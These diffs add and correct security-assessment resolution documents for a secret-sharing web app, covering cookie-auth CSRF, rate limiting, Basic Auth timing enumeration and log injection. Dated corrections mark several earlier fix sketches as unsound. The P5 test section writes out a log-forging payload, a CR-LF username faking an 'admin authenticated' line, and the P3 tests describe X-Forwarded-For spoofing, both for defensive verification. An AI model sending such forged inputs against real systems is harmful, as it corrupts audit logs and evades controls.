+++ b/docs/security/assessment-2026-06-22/resolutions/P1-csrf-cookie-auth-api.md
@@ -1,11 +1,29 @@
 # P1 — CSRF protection bypassed for cookie-authenticated API mutations
 
-- **Severity:** High (any logged-in/cookie session using API-backed actions)
-- **Status:** Proposed fix
+- **Severity:** High (any logged-in/cookie session using API-backed actions) — recalibrated to **Medium** by 2026-06-24 re-verification (§7)
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below**
 - **Affects default config?** Conditional — applies once accounts/sessions are used
 - **Related:** S2 (HttpOrigin off by default). Finding 04 #2.
 - **Primary files:** `lib/onetime/middleware/security.rb:142` (blanket `/api/` CSRF exemption),
   `apps/api/*/auth_strategies.rb` (per-route `auth=sessionauth,...`)
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §5).**
+> The prescribed fix below is **unsound** against rack-protection 4.2.1 — it will not run as written.
+> Three independent failures: (1) `:except_when` is **not a recognized option** — the gem only honours
+> `:allow_if` (`rack/protection/authenticity_token.rb:103,120`); (2) **wrong lambda arity** — the gem calls
+> `options[:allow_if]&.call(env)` single-arg (`:120`), the sketch passes `->(req, env)`; (3)
+> `env['otts.auth_method']` is **never populated** (0 writes in `lib`/`apps`) and is unreadable at middleware
+> time anyway — the Security middleware runs *before* post-routing auth resolves.
+>
+> Reachability also corrected **false → partial** (hand-verified §3a): `sessionauth` is registered by default
+> (mode-independent; `auth_strategies.rb:49-54` gates on `authentication.enabled` alone), so cookie-auth
+> `/api` mutation endpoints exist out of the box — but the session cookie defaults to `SameSite=Lax`
+> (`boot.rb:80-85`), which blocks the headline cross-site POST, leaving only same-site-subdomain / legacy-browser
+> residuals. **Severity recalibrated High → Medium (§7).**
+>
+> **Correction:** discriminate **inside** the existing single-arg `:allow_if` lambda — exempt only requests
+> with no `onetime.session` cookie **or** an explicit `Authorization` header; enforce `X-CSRF-Token` otherwise
+> (the SPA already sends it). Do not rely on a custom env key or a two-arg lambda.
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/P3-rate-limiting-gaps.md
+++ b/docs/security/assessment-2026-06-22/resolutions/P3-rate-limiting-gaps.md
@@ -1,0 +1,164 @@
+# P3 — Rate-limiting gaps on auth/login and secret creation
+
+- **Severity:** Medium
+- **Status:** Proposed fix
+- **Affects default config?** Yes — anonymous secret creation (`/api/v3/guest/*`, `/api/v2/secret/conceal`) and login are reachable in the default deployment
+- **Related:** A3/P2 (trusted-proxy / host-header trust — the IP key must use the otto-resolved client IP). Findings 04 #4, §3, §9.4.
+- **Primary files:** `apps/api/v1/controllers/base.rb:145-171` (fail-open, auth-exempt V1 limiter),
+  `apps/api/v2/logic/secrets/base_secret_action.rb:41-48` (`raise_concerns` — wire-in point for conceal/generate),
+  `apps/web/auth/config/features/lockout.rb` (Rodauth account lockout — present but not IP-keyed),
+  `lib/onetime/security/feedback_rate_limiter.rb` / `invite_token_rate_limiter.rb` (the well-built pattern to reuse),
+  `lib/onetime/application/auth_strategies/helpers.rb:67-79` (canonical IP resolution)
+
+## Problem (recap)
+
+There is no application-layer rate limiting on the two surfaces most exposed to abuse:
+
+1. **Auth / login.** No limiter wraps session authentication, registration, or password reset. Rodauth's
+   `lockout` feature locks an *account* after 5 invalid logins (`lockout.rb:15`), but that is keyed on the
+   target account, not the client — it does not throttle credential-stuffing across many accounts, nor
+   anonymous registration/reset flooding.
+2. **V2 / V3 secret creation.** `POST /api/v2/secret/conceal|generate` and the anonymous
+   `/api/v3/guest/*` conceal/generate routes are unthrottled in-app. Only passphrase brute-force on
+   *retrieval* is limited (`apps/api/v2/logic/secrets/show_secret.rb:53` wires `PassphraseRateLimiter`).
+3. **The V1 limiter is the wrong template.** `check_rate_limit!` (`base.rb:145-171`) is atomic (good —
+   Lua INCR+EXPIRE at `:139-143`), but it **fails open** on any Redis error (`:165-168`) and **fully
+   exempts authenticated non-anonymous customers** (`:147`). The code itself calls it "vestigial …
+   enforced externally (infrastructure layer)" (`:124-126`). It is wired into V1 create/read only
+   (`apps/api/v1/controllers/index.rb:67,87,154,192`).
+
+Combined with the public unauthenticated intake surface (Finding §9.4), the absence of a creation limit
+makes flooding / resource-exhaustion and large-scale enumeration cheap.
+
+## Root cause
+
+Rate limiting was treated as an infrastructure-layer concern (proxy/WAF) and the in-app V1 limiter was
+deliberately neutered. The four purpose-built limiters (passphrase, feedback, invite, DNS) demonstrate the
+correct in-app pattern but were only applied to the specific endpoints that motivated each one; the
+general auth and creation paths were never given one.
+
+## Prescribed resolution
+
+Reuse the existing **atomic, fail-closed-where-it-matters** limiter pattern (the feedback/invite shape:
+server-side Lua INCR+EXPIRE, lockout key, no auth exemption) and apply it to login and secret creation,
+keyed on the **otto-resolved client IP** (and, for authenticated requests, additionally on account).
+
+### Implementation steps
+
+1. **Add a reusable creation/auth limiter module** modeled on
+   `lib/onetime/security/feedback_rate_limiter.rb`. Keep the same structure: a `RECORD_*_SCRIPT` Lua
+   string that does `INCR` + `EXPIRE` + lockout via `SETEX`, a `check_*!` that raises
+   `Onetime::LimitExceeded` (`lib/onetime/errors.rb:224`) when locked, and a `record_*!` called on each
+   attempt. Place it under `lib/onetime/security/` so it sits alongside the others.
+
+   ```ruby
+   # lib/onetime/security/secret_creation_rate_limiter.rb (sketch — mirrors feedback_rate_limiter.rb)
+   module Onetime::Security::SecretCreationRateLimiter
+     MAX_CREATES     = 100   # per window; tune per plan
+     RATE_WINDOW     = 600
+     LOCKOUT_DURATION = 600
+
+     def check_secret_creation_rate_limit!(ip_address)
+       return if ip_address.to_s.empty?       # see fail-closed note below
+       # ... identical pipelined exists?/ttl check + raise LimitExceeded as feedback limiter ...
+     end
+
+     def record_secret_creation!(ip_address)
+       # ... identical atomic Lua INCR+EXPIRE+SETEX as feedback_rate_limiter.rb:36-56 ...
+     end
+   end
+   ```
+
+2. **Key on the otto-resolved client IP, never a raw header.** Inside the secret-creation logic
+   (`BaseSecretAction`), the resolved IP is already carried on the strategy result:
+   `strategy_result.metadata[:ip]`, which is populated by `build_metadata` →
+   `client_ip(env)` → `env['otto.client_ip']` (`lib/onetime/application/auth_strategies/helpers.rb:44-79`).
+   This is the trusted-proxy-aware value (`Otto::Utils.resolve_client_ip`, `/home/user/otto/lib/otto/utils.rb:112-140`),
+   so a spoofed `X-Forwarded-For` from an untrusted peer cannot rotate the key. **Do not** read
+   `env['HTTP_X_FORWARDED_FOR']` or `Rack::Request#ip` directly. (This is the same key source the V1
+   controller uses via `req.client_ipaddress`, `/home/user/otto/lib/otto/request.rb:122-132`.) For a
+   defence-in-depth account dimension, also key on `cust&.objid` when authenticated.
+
+   **Cross-reference A3/P2:** the limiter's anti-spoofing guarantee depends entirely on the otto 2.3.1
+   trusted-proxy configuration (`site.network.trusted_proxy`) being correct. If the ingress appends rather
+   than overwrites `X-Forwarded-For`, or trusts an over-broad private range, the resolved IP can be
+   attacker-influenced (Finding §1.1, §3 "Key-derivation / bypass"). Land the A3/P2 host/proxy
+   harmonization alongside this, and confirm the ingress overwrites XFF.
+
+3. **Wire creation limiting into `BaseSecretAction#raise_concerns`** (the same lifecycle slot
+   `ShowSecret` uses for the passphrase limiter at `show_secret.rb:46-54`), so both conceal and generate
+   inherit it for V2 and V3:
+
+   ```ruby
+   # apps/api/v2/logic/secrets/base_secret_action.rb
+   include Onetime::Security::SecretCreationRateLimiter
+
+   def raise_concerns
+     check_secret_creation_rate_limit!(strategy_result.metadata[:ip])
+     require_entitlement!('api_access')
+     # ... existing checks ...
+   end
+
+   def process
+     create_secret_pair
+     record_secret_creation!(strategy_result.metadata[:ip]) if greenlighted
+     handle_success
+   end
+   ```
+
+4. **Add login/auth throttling keyed on client IP**, complementing Rodauth's per-account `lockout`. The
+   cleanest place is a Rodauth `before_login_attempt`/`before_create_account` hook (see
+   `apps/web/auth/config/hooks/login.rb`) that calls a `check_*!`/`record_*!` pair keyed on the
+   otto-resolved IP. This throttles credential-stuffing and registration/reset flooding that per-account
+   lockout misses. Keep Rodauth `lockout` enabled — the two are complementary (account vs. client).
+
+5. **Make the limiter fail-closed on the abuse surface — but bounded.** The V1 limiter's blanket
+   "fail open on any Redis error" (`base.rb:165-168`) means an attacker who can stress Redis disables the
+   limit. For the new limiters, treat a Redis failure as *fail-closed for anonymous creation/login*
+   (reject with a 429/`LimitExceeded` and log loudly) rather than silently allowing unlimited traffic.
+   To avoid a self-inflicted outage if Redis is briefly unavailable, gate fail-closed behind a short
+   circuit-breaker / allow a small burst, but do not default to unlimited. Empty/unresolvable IP
+   (`ip_address.to_s.empty?`) is the one case that must still fail open, because an authenticated request
+   with a missing IP should not be hard-blocked — rely on the account-key dimension there.
+
+6. **Do not exempt authenticated users wholesale.** Replace the V1 `cust && !cust.anonymous?` bypass with
+   per-plan limits (higher ceilings for paid plans, never "unlimited"). A compromised/abusive authenticated
+   account should still hit a ceiling.
+
+7. **(Optional) retire or fix the V1 limiter.** Either delete `check_rate_limit!` and its call sites if V1
+   is being deprecated, or refactor it onto the shared module so all three (V1/V2/V3) share one
+   fail-closed, non-exempting implementation. Don't leave the vestigial fail-open version as the only V1
+   defence.
+
+### Alternatives considered
+
+- **Rely solely on infrastructure (proxy/WAF) rate limiting** (the current stated posture, `base.rb:124-126`):
+  insufficient as the *only* control — it is invisible to the app, not enforced in tests/CI, varies per
+  deployment, and is absent for self-hosters who don't run a tuned proxy. App-layer limiting is the
+  portable floor; infra limiting remains a complementary outer layer.
+- **Per-account lockout only (Rodauth `lockout`):** does not stop credential-stuffing across many accounts
+  or anonymous flooding. Keep it, but add IP-keyed throttling on top.
+- **Global (non-IP) creation counter:** trivially turns into a self-DoS (one abuser exhausts everyone's
+  budget). Per-IP + per-account keying localizes the impact.
+
+## Test / verification
+
+- Anonymous `POST /api/v3/guest/secret/conceal` repeated past `MAX_CREATES` within the window from a single
+  resolved client IP → `429`/`LimitExceeded`; a different IP is unaffected.
+- Spoof attempt: send the over-limit requests with rotating `X-Forwarded-For` values from a **non-trusted**
+  peer → all map to the same bucket (the resolved `env['otto.client_ip']` is unchanged) and are throttled.
+  From a configured trusted proxy with a genuinely different upstream IP → separate buckets (expected).
+- Login: N+1 failed logins from one IP across *different* usernames → throttled by the new IP limiter even
+  though no single account hit Rodauth's lockout; legitimate single-user retries within budget still work.
+- Redis-down behaviour: with Redis unavailable, anonymous creation/login is rejected (fail-closed), logged,
+  and recovers when Redis returns; an authenticated request with an unresolved IP is not hard-blocked.
+- Paid plan: authenticated paid user gets the higher ceiling but is still limited (no `unlimited`).
+
+## Effort & risk
+
+- **Effort:** Medium — one new limiter module (copy of the feedback limiter), two wire-ins
+  (`BaseSecretAction#raise_concerns`/`process` and a Rodauth login hook), plus plan-tier limit config.
+- **Risk:** Medium — mis-tuned limits or a too-aggressive fail-closed policy can block legitimate traffic;
+  validate the IP key source (`strategy_result.metadata[:ip]` / `env['otto.client_ip']`) actually flows
+  through in V3 guest routes, and land the A3/P2 trusted-proxy harmonization so the key can't be spoofed.
+  Start limits generous and tighten with telemetry.

--- a/docs/security/assessment-2026-06-22/resolutions/P3-rate-limiting-gaps.md
+++ b/docs/security/assessment-2026-06-22/resolutions/P3-rate-limiting-gaps.md
@@ -1,7 +1,7 @@
 # P3 — Rate-limiting gaps on auth/login and secret creation
 
 - **Severity:** Medium
-- **Status:** Proposed fix
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below**
 - **Affects default config?** Yes — anonymous secret creation (`/api/v3/guest/*`, `/api/v2/secret/conceal`) and login are reachable in the default deployment
 - **Related:** A3/P2 (trusted-proxy / host-header trust — the IP key must use the otto-resolved client IP). Findings 04 #4, §3, §9.4.
 - **Primary files:** `apps/api/v1/controllers/base.rb:145-171` (fail-open, auth-exempt V1 limiter),
@@ -9,6 +9,19 @@
   `apps/web/auth/config/features/lockout.rb` (Rodauth account lockout — present but not IP-keyed),
   `lib/onetime/security/feedback_rate_limiter.rb` / `invite_token_rate_limiter.rb` (the well-built pattern to reuse),
   `lib/onetime/application/auth_strategies/helpers.rb:67-79` (canonical IP resolution)
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §5).**
+> The prescribed fix below **under-counts** — it records the limiter budget only on *successful* creation,
+> so failed/abusive attempts cost an attacker nothing and they flood freely under the limit.
+> Step 3's `process` calls `record_secret_creation!(...) if greenlighted` (`base_secret_action.rb:104` in the
+> sketch), and `greenlighted` is only true when the secret actually stores
+> (`@greenlighted = receipt.valid? && secret.valid?`, `apps/api/v2/logic/secrets/base_secret_action.rb:334`).
+> A request that fails validation, or is deliberately malformed, burns no quota.
+>
+> **Correction:** count at **attempt time**, not on success. Record the attempt *before* the success branch —
+> e.g. call `record_secret_creation!(strategy_result.metadata[:ip])` in `raise_concerns` alongside (right
+> after) `check_secret_creation_rate_limit!`, or at the top of `process` unconditionally — so every attempt,
+> including rejected ones, consumes the budget. Drop the `if greenlighted` guard on the limiter record.
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/P4-v1-basicauth-timing-enumeration.md
+++ b/docs/security/assessment-2026-06-22/resolutions/P4-v1-basicauth-timing-enumeration.md
@@ -1,12 +1,26 @@
 # P4 — V1 Basic Auth timing-distinguishable username enumeration
 
 - **Severity:** Low/Medium
-- **Status:** Proposed fix
+- **Status:** Proposed fix — **superseded by re-verification correction (2026-06-24) below**
 - **Affects default config?** Conditional — only when API v1 + Basic Auth (`session_auth_enforced?`) is enabled
 - **Related:** P5 (log injection on the same code path). Findings 04 #5, §8 "Enumeration — V1 exception".
 - **Primary files:** `apps/api/v1/controllers/base.rb:68-71` (the timing-distinguishable path),
   `lib/onetime/application/auth_strategies/basic_auth_strategy.rb:42-91` (the V2/V3 constant-time
   reference to mirror), `lib/onetime/models/customer.rb` (`Onetime::Customer.dummy`, `apitoken?`)
+
+> **⚠️ Re-verification correction (2026-06-24 blind pass — `RE-VERIFICATION-2026-06-24-independent.md` §4 table row P4).**
+> The prescribed fix below is **unsound** — swapping in `Customer.dummy` does not close the timing oracle.
+> `Customer.dummy` (`customer.rb:331-341`) sets a dummy `passphrase` but assigns **no `apitoken`**, so
+> `apitoken?` short-circuits at `customer.rb:263` (`return false if apitoken.to_s.empty? || value.to_s.empty?`)
+> and `secure_compare` is **never reached** for the dummy — the missing-user path stays fast, exactly the
+> oracle the fix targets. The "expensive BCrypt comparison" premise is also wrong: `apitoken?` uses
+> `Rack::Utils.secure_compare` (`customer.rb:265`, sub-microsecond), not BCrypt.
+>
+> **Correction:** give the dummy a real token so a wrong guess actually reaches `secure_compare` and the
+> compare time is constant. In `Customer.dummy` assign `dummy_cust.apitoken = SecureRandom.hex(32)` before
+> `freeze`; then the V1 `target_cust.apitoken?(apitoken)` call runs the constant-time `secure_compare` whether
+> or not the user exists. Residual (optional, defense-in-depth): `load_by_extid_or_email` still deserializes on
+> a hit vs returns `nil` on a miss — a noise-dominated difference, not the dominant signal.
 
 ## Problem (recap)
 

--- a/docs/security/assessment-2026-06-22/resolutions/P4-v1-basicauth-timing-enumeration.md
+++ b/docs/security/assessment-2026-06-22/resolutions/P4-v1-basicauth-timing-enumeration.md
@@ -1,0 +1,100 @@
+# P4 — V1 Basic Auth timing-distinguishable username enumeration
+
+- **Severity:** Low/Medium
+- **Status:** Proposed fix
+- **Affects default config?** Conditional — only when API v1 + Basic Auth (`session_auth_enforced?`) is enabled
+- **Related:** P5 (log injection on the same code path). Findings 04 #5, §8 "Enumeration — V1 exception".
+- **Primary files:** `apps/api/v1/controllers/base.rb:68-71` (the timing-distinguishable path),
+  `lib/onetime/application/auth_strategies/basic_auth_strategy.rb:42-91` (the V2/V3 constant-time
+  reference to mirror), `lib/onetime/models/customer.rb` (`Onetime::Customer.dummy`, `apitoken?`)
+
+## Problem (recap)
+
+V1's controller-level `authorized` (`base.rb:68-71`) loads the customer and only runs the (expensive)
+BCrypt-backed `apitoken?` check **when the customer exists**:
+
+```ruby
+possible = Onetime::Customer.load_by_extid_or_email(custid)
+@cust = possible if possible&.apitoken?(apitoken)   # apitoken? only runs when possible != nil
+raise OT::Unauthorized, 'Invalid credentials' if cust.nil?
+```
+
+For a non-existent username, `possible` is `nil`, the `&.apitoken?` short-circuits, and the expensive
+comparison is skipped — so the response returns measurably faster than for an existing username with a
+wrong token. The error messages are uniform (`'Invalid credentials'`, `:58,:61,:71,:86`), so this is a
+**timing-only** oracle, but it still lets an attacker enumerate valid usernames/emails.
+
+V2/V3 do **not** have this problem: `BasicAuthStrategy` uses a dummy customer with a real BCrypt hash so
+the same ~constant-time work runs whether or not the user exists (`basic_auth_strategy.rb:42-91`).
+
+## Root cause
+
+The V1 path uses Ruby's safe-navigation short-circuit (`possible&.apitoken?`) as the existence gate, which
+makes the cost of the cryptographic comparison conditional on user existence. V1 predates (and never
+adopted) the dummy-customer constant-time mitigation that V2/V3 introduced.
+
+## Prescribed resolution
+
+Mirror the V2/V3 constant-time path in V1: **always** perform the BCrypt token comparison against a real
+hash, using a dummy customer when the user doesn't exist, and decide success only afterward.
+
+### Implementation steps
+
+1. **Always run `apitoken?` against a real hash.** Replace the short-circuit with the V2/V3 pattern
+   (`basic_auth_strategy.rb:54-60`):
+
+   ```ruby
+   # apps/api/v1/controllers/base.rb  (inside the Basic Auth branch, replacing :68-71)
+   cust_record = Onetime::Customer.load_by_extid_or_email(custid)
+
+   # Timing-attack mitigation: always perform the expensive BCrypt comparison,
+   # using a dummy customer with a real hash when the user does not exist, so
+   # the work (and thus the response time) is identical for existing and
+   # non-existing usernames. Mirrors BasicAuthStrategy#authenticate.
+   target_cust       = cust_record || Onetime::Customer.dummy
+   valid_credentials = target_cust.apitoken?(apitoken)
+
+   # Only succeed with a real customer AND valid credentials.
+   @cust = cust_record if cust_record && valid_credentials
+   raise OT::Unauthorized, 'Invalid credentials' if cust.nil?
+   ```
+
+   This keeps the existing uniform error message and the existing `@cust`-nil guard at `base.rb:90`; the
+   only change is that the BCrypt comparison now executes on every attempt.
+
+2. **Reuse the exact same `dummy`/`apitoken?` primitives** that V2/V3 already rely on
+   (`Onetime::Customer.dummy`, `Customer#apitoken?`) so there is a single constant-time implementation and
+   no second dummy hash to keep in sync. Do not introduce a V1-specific comparison.
+
+3. **Confirm `apitoken?` itself is constant-time** for a given hash (it is the same method V2/V3 trust at
+   `basic_auth_strategy.rb:57`). The mitigation only holds if `apitoken?` does not itself early-return on a
+   malformed/empty token before hashing; the `custid`/`apitoken` empty-string guard already runs earlier
+   (`base.rb:61`), so by this point both are non-empty.
+
+### Alternatives considered
+
+- **Deprecate / remove V1 Basic Auth entirely** (Finding §8 suggests this as an option). Valid long-term —
+  V2/V3 are the maintained path — but until V1 is removed it still authenticates real requests, so the
+  cheap constant-time fix should land regardless. Treat removal as a separate deprecation track.
+- **Add an artificial fixed delay (`sleep`) on the not-found path:** fragile and a DoS amplifier (ties up a
+  worker per request); a real BCrypt comparison is the correct constant-work approach and matches V2/V3.
+- **Normalize only the error message/status:** already done (uniform `'Invalid credentials'`); it does not
+  address the timing side channel, which is the actual gap here.
+
+## Test / verification
+
+- Timing parity: with auth enabled, send Basic Auth for (a) a known-existing username with a wrong token
+  and (b) a definitely-non-existent username, many iterations; the response-time distributions should be
+  statistically indistinguishable (both incur the BCrypt cost). Before the fix, (b) is consistently faster.
+- Functional regression: valid `custid` + valid apitoken → authenticated (`@cust` set), unchanged; valid
+  `custid` + wrong token → `Unauthorized`; non-existent `custid` → `Unauthorized`; all return the same
+  `'Invalid credentials'` message and status.
+- Anonymous and `disabled_response` paths (`base.rb:65,75-87`) unchanged.
+
+## Effort & risk
+
+- **Effort:** Low — a few lines in one method, reusing existing `Customer.dummy`/`apitoken?`.
+- **Risk:** Low — behaviour-preserving for all valid/invalid outcomes; the only change is that every
+  attempt now pays the BCrypt cost (intended). Confirm `Customer.dummy` is available in the V1 runtime
+  (it is loaded for V2/V3) and that the per-request BCrypt cost is acceptable for V1 throughput — pair with
+  P3 so the constant-cost path can't be abused for CPU exhaustion.

--- a/docs/security/assessment-2026-06-22/resolutions/P5-v1-log-injection-username.md
+++ b/docs/security/assessment-2026-06-22/resolutions/P5-v1-log-injection-username.md
@@ -1,0 +1,112 @@
+# P5 — Log injection via attacker-controlled Basic Auth username
+
+- **Severity:** Low
+- **Status:** Proposed fix
+- **Affects default config?** Conditional — only in debug-enabled environments (`OT.ld`/`OT.debug?`)
+- **Related:** P4 (same code path / Basic Auth branch). Findings 04 #5, §9.3.
+- **Primary files:** `apps/api/v1/controllers/base.rb:67,73,80-81` (unsanitized `custid` in log lines),
+  `lib/onetime/security/input_sanitizers.rb:40,104-106` (existing `NEWLINE_STRIP_PATTERN` / CR-LF stripping)
+
+## Problem (recap)
+
+V1's `authorized` interpolates the Basic Auth username (`custid`) into log lines without stripping
+newlines:
+
+```ruby
+OT.ld "[authorized] Attempt for '#{custid}' via #{req.client_ipaddress} (basic auth)"        # :67
+OT.ld "[authorized] '#{custid}' via #{req.client_ipaddress} (basic auth authenticated)"      # :73
+```
+
+`custid` is fully attacker-controlled — it is the username decoded from the `Authorization: Basic` header
+(`base.rb:60`). With a plain-text logger, a `custid` containing CR/LF lets an attacker inject forged log
+lines (log forging / log spoofing), e.g. fabricating a fake "authenticated" entry for another user or
+breaking log-parsing tooling. It is `OT.ld` (debug level, gated by `OT.debug?` at `:79`), so exposure is
+limited to debug-enabled environments, and a structured (JSON) logger that escapes field values would
+neutralize it — but neither mitigation is guaranteed by default.
+
+## Root cause
+
+Untrusted, attacker-supplied identifiers are interpolated directly into a line-oriented log format. The
+codebase already has the tools to prevent this (`InputSanitizers::NEWLINE_STRIP_PATTERN`, used for
+email-header-injection defense at `input_sanitizers.rb:104-106`) but they are not applied to logged
+identifiers. The sanitizers are opt-in per call site, so coverage depends on each caller remembering to
+use them.
+
+## Prescribed resolution
+
+Sanitize/encode user-controlled fields before they reach a line-oriented log, and prefer structured logging
+that escapes values. Apply consistently to all untrusted identifiers, not just this one site.
+
+### Implementation steps
+
+1. **Strip CR/LF (and other control characters) from `custid` before logging.** Reuse the existing
+   pattern rather than inventing a new one. `InputSanitizers` is already mixed into the logic layer; expose
+   a small helper (or call the existing constant) at the V1 controller log sites:
+
+   ```ruby
+   # apps/api/v1/controllers/base.rb
+   # Strip CR/LF so an attacker-controlled username can't forge log lines.
+   # NEWLINE_STRIP_PATTERN is the same constant used for email-header-injection
+   # defense (input_sanitizers.rb:40,104-106).
+   safe_custid = custid.to_s.gsub(Onetime::Security::InputSanitizers::NEWLINE_STRIP_PATTERN, '')
+
+   OT.ld "[authorized] Attempt for '#{safe_custid}' via #{req.client_ipaddress} (basic auth)"
+   # ... and likewise at :73 and the anonymous/:80-81 sites for any untrusted field ...
+   ```
+
+   Consider stripping all C0 controls (not only `\r\n`) for defense in depth — e.g. a
+   `[\x00-\x1f\x7f]`-class strip — since some terminals/aggregators react to other control bytes. The
+   minimum fix is CR/LF.
+
+2. **Centralize so it can't be forgotten.** Add a single `sanitize_log_field`/`loggable(value)` helper
+   (e.g. on `InputSanitizers` or a `LoggerMethods` mixin already used by the logic layer) that strips
+   control characters, and route untrusted identifiers (`custid`, emails, domains, user agents) through it
+   at every log site. This matches the codebase's existing approach of one shared sanitizer per concern and
+   avoids repeating the inline `gsub`.
+
+3. **Prefer structured logging that escapes values (strategic layer).** Where logs are emitted as JSON
+   (the assessment notes a structured logger neutralizes this entirely, §9.3), pass `custid` as a discrete
+   field rather than interpolating it into a message string, so the serializer escapes it:
+
+   ```ruby
+   OT.ld('[authorized] basic auth attempt', custid: safe_custid, ip: req.client_ipaddress)
+   ```
+
+   This is the durable fix — escaping at the logging boundary protects every field, not just the ones a
+   developer remembered to pre-sanitize. The CR/LF strip in step 1 remains valuable as defense-in-depth for
+   any plain-text logger path.
+
+4. **Avoid logging the raw username at all where unnecessary.** These are `OT.ld` debug lines; for an
+   *unauthenticated attempt* the username has little operational value and is attacker-controlled. Consider
+   logging an obscured form (the limiters already obscure IPs, e.g. `feedback_rate_limiter.rb:146-153`) or
+   only logging the username on the authenticated path. Combined with P4's constant-time fix, the
+   "attempt" line can be reduced to a counter without the raw value.
+
+### Alternatives considered
+
+- **Rely on the logger being JSON in production:** correct that it neutralizes the issue, but it is a
+  deployment assumption, not a guarantee, and plain-text/dev loggers remain vulnerable. Do the boundary
+  escaping (step 3) *and* the cheap strip (step 1) so the fix holds regardless of logger config.
+- **HTML/percent-encode the value:** wrong tool — these are log lines, not HTML; CR/LF (and control-char)
+  stripping plus structured-field escaping is the appropriate encoding for the sink.
+- **Drop the log lines entirely:** loses useful auth telemetry; sanitize/obscure instead of removing.
+
+## Test / verification
+
+- Send Basic Auth with a username containing `%0d%0a` / literal CR-LF (e.g.
+  `Authorization: Basic base64("user\r\n[authorized] 'admin' ... (basic auth authenticated):token")`) with
+  debug logging on → the emitted log contains a single line with the newline removed; no forged second line
+  appears.
+- Username with other control characters → control bytes stripped (if step 1 broadened to C0 controls).
+- Structured-logger path: `custid` appears as an escaped JSON field value, not as injected message
+  structure.
+- Functional regression: normal usernames log unchanged (minus any trailing/embedded control chars);
+  auth outcome is unaffected.
+
+## Effort & risk
+
+- **Effort:** Low — one helper + a few call-site changes; optionally extend to a `loggable` helper used
+  across the logging layer.
+- **Risk:** Low — purely log-formatting; no change to auth logic or stored data. Main care is applying the
+  same helper at all untrusted-field log sites (`:67,:73,:80-81` here, and similar sites in
+  `apps/api/v1/controllers/helpers.rb:86,113`) so the gap isn't reintroduced.

--- a/docs/security/assessment-2026-06-22/resolutions/README.md
+++ b/docs/security/assessment-2026-06-22/resolutions/README.md
@@ -1,0 +1,85 @@
+# Resolutions — index
+
+One prescribed-fix document per finding from the 2026-06-22 assessment. Each doc states severity,
+default-config applicability, root cause, a principled long-term fix (with code-level guidance,
+alternatives, tests, and effort/risk), and back-compat/migration notes. See `../risk-register.md` for
+the ranked finding list and `../findings/00-EXECUTIVE-REPORT.md` for the synthesis.
+
+> These are **prescriptions**, not applied changes. Implement behind the existing feature flags, with
+> the tests each doc specifies. The maintainer's guidance: take the revisions/stacked PRs needed to get
+> it right.
+
+## The Critical and its tie to issue #3499
+
+The Critical (**A1**, SSO email-match account takeover) is **not** a standalone patch — it belongs in the
+already-open work of **#3499 "Support SSO accounts when IdP omits the email claim."** #3499 already
+defines the right surface: a single `resolve_omniauth_email` helper and an explicit **IdP claim
+trust-tier** model, and it explicitly names the takeover vector ("writing an unverified … claim into
+[`accounts.email`] could link an SSO identity to the wrong account"). A1 extends that rule from *which
+claim populates the column* to *the linking decision itself*: require a verified Tier-1 email and never
+silently merge an SSO identity into a pre-existing password account. SSO is not yet in production, so this
+can be designed into the feature rather than retrofitted. See `A1-sso-account-linking.md`.
+
+**Recommended stacked-PR sequence for the SSO cluster:**
+1. **PR-1 = #3499 Phase 1** — `resolve_omniauth_email`, Tier-1/verified-only email.
+2. **PR-2 = A1 + A4 + A2** on top — secure linking (no silent merge), domain allowlist on the linking
+   path, and no MFA bypass for SSO.
+
+## Suggested overall ordering
+
+1. **Now / default-config:** `C1` (atomic one-time consume) · `S1` + `S2` (secure-header defaults) ·
+   `D1` (oauth2 bump).
+2. **Before SSO ships:** `A1` · `A2` · `A4` · `A3-P2` (host-header trust) · `P1` (cookie-auth CSRF).
+3. **Hardening:** `C2` · `C3` · `P3` · `AZ1` · `AZ2` · `A5` · `A6` · `A7` · `A8` · `D3` · `D4` · `D5`.
+4. **Cleanup / pre-emptive:** `C4` · `C5` · `C6` · `AZ3` · `AZ4` · `AZ5` · `AZ6` · `AZ7` · `AZ8` ·
+   `AZ9` · `P4` · `P5` · `S3` · `S4` · `S5` · `D2` · `OBS1`.
+
+## All resolutions
+
+### Critical
+- [A1 — SSO email-match account takeover (secure account linking)](A1-sso-account-linking.md)
+
+### High
+- [C1 — One-time reveal/burn is not concurrency-safe (atomic consume)](C1-one-time-reveal-atomicity.md) · *default config; PoC-confirmed*
+- [A2 — SSO bypasses MFA unconditionally](A2-sso-mfa-bypass.md)
+- [A3 / P2 — Host-header trust (poisoned auth-email links & host injection)](A3-P2-host-header-trust.md)
+- [A4 — SSO domain allowlist not enforced on linking](A4-sso-domain-allowlist.md)
+- [P1 — CSRF bypassed for cookie-authenticated API mutations](P1-csrf-cookie-auth-api.md)
+- [S1 — CSP disabled by default](S1-csp-default-on.md) · *default config*
+- [S2 — Clickjacking / HSTS / security headers off by default](S2-security-headers-default-on.md) · *default config*
+- [D1 — `oauth2` 2.0.18 bearer-token leak CVE](D1-oauth2-cve.md)
+
+### Medium
+- [C2 — Encryption HKDF salt/personalization left at shared library default](C2-encryption-domain-separation.md)
+- [C3 — V1 reveal path has no passphrase rate limiting](C3-v1-passphrase-rate-limit.md)
+- [C4 — Passphrase rate-limit check/record non-atomic + test Argon2 cost guard](C4-rate-limit-atomicity-argon2-guard.md)
+- [P3 — Rate-limiting gaps (login, secret creation)](P3-rate-limiting-gaps.md)
+- [AZ1 — RemoveMember authorization inconsistency](AZ1-remove-member-entitlement-gate.md)
+- [AZ2 — Organization safe_dump leaks internal/cross-tenant data](AZ2-organization-safe-dump-minimization.md)
+- [AZ3 — Organization.create! open splat (mass assignment)](AZ3-organization-create-allowlist.md) · *needs-validation*
+- [AZ4 — change_role! accepts `owner`](AZ4-change-role-reject-owner.md) · *needs-validation*
+- [AZ5 — Organization external id uses plain SHA-256 (no keyed HMAC)](AZ5-organization-extid-keyed-hmac.md) · *needs-validation*
+- [A5 — Recovery codes stored plaintext](A5-recovery-codes-plaintext.md)
+- [A6 — WebAuthn RP-ID/origin derived from request.host](A6-webauthn-rpid.md)
